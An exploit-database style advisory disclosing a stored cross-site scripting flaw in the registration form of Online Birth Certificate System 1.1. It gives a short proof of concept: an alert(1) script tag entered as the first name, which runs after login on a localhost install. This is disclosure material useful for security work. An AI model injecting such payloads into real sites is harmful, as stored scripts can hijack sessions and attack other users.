Exploits / Vulnerability Discovered : 2021-07-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Online birth certificate system 1.1 multiple stored crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/OBCS/obcs/user/register.php
2) In the first name field, enter the payload: <script>alert(1)</script>
3) Click Register
4) Goto: http://localhost/OBCS/obcs/user/login.php
5) Enter your mobile number, password & click login
6) our XSS attack successfull
# PoC image
1) https://ibb.co/7C6g6nK
Online birth certificate system 1.1 multiple stored crosssite scripting (xss)